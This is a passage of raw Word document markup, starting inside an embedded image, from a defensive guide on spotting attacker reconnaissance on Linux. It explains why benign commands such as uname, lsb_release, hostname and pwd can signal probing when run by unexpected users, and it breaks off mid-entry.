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" id="26" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3557778"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure: Example Linux terminal (Debian) showing system info commands. Attackers often run commands like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">lsb_release -a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">to gather environment details</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t xml:space="preserve">[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="34" w:name="basic-discovery-commands-osfilesystem"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Basic Discovery Commands (OS/Filesystem)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attackers’ first moves on a new Linux host mirror legitimate reconnaissance. Defenders must flag contextually odd usage of even simple commands</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[2]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Show kernel and OS details (e.g. version, architecture).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reveals system information. In normal ops, used for debugging or inventory. If run by an unexpected user/process (e.g. a web server), it could signal an attacker probing for kernel exploits</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId28">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[4]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lsb_release -a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Displays Linux distribution name, release and codename.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tells you the distro/version. A red flag if a non-admin user suddenly queries this – attacker may seek known OS vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Shows or sets the host’s network name.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Attackers run this to confirm environment (especially cloud hostnames). Monitoring its execution (e.g. via auditd) can expose scripted reconnaissance. In one scenario, a service user ran</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, triggering an alert</w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId29">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">[5]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Print current working directory.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Importance:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
